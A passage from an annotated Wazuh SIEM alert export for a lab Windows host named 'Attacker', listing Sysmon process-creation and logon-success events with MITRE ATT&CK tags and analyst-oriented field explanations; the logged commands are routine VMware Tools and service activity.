No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Suspicious Windows cmd shell execution

🧠 What happened? Suspicious Windows cmd shell execution

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:32:02.664+0000 | 🧠 MITRE: ['Discovery', 'Execution'] – ['Account Discovery', 'Windows Command Shell'] [T1087] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:02.664+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Suspicious Windows cmd shell execution
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92032
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087', 'T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery', 'Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery', 'Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533922.313499
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:36:54.6551986Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  212047
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-17 16:36:54.622 ProcessGuid: {94294ddc-2e26-6801-dc07-000000000e00} ProcessId: 9800 Image: C:\Windows\System32\conhost.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Console Window Host Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: CONHOST.EXE CommandLine: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 CurrentDirectory: C:\WINDOWS User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D ParentProcessGuid: {94294ddc-2e25-6801-d807-000000000e00} ParentProcessId: 4044 ParentImage: C:\Windows\System32\cmd.exe ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:36:54.622
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-2e26-6801-dc07-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9800
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\conhost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Console Window Host
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  CONHOST.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=EDDF1F02AF16312858678F31843F1CAB05A6DF47D9BA15C0AA117F583E669D9D
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-2e25-6801-d807-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:03.049+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:03.049+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  28
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533923.318979
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:17.3947487Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43643
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9160
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:03.172+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:03.172+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  29
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533923.326315
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:31.0469437Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43645
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9160
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:03.228+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:03.228+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  30
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533923.333651
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:46:35.7410981Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43647
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9160
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. 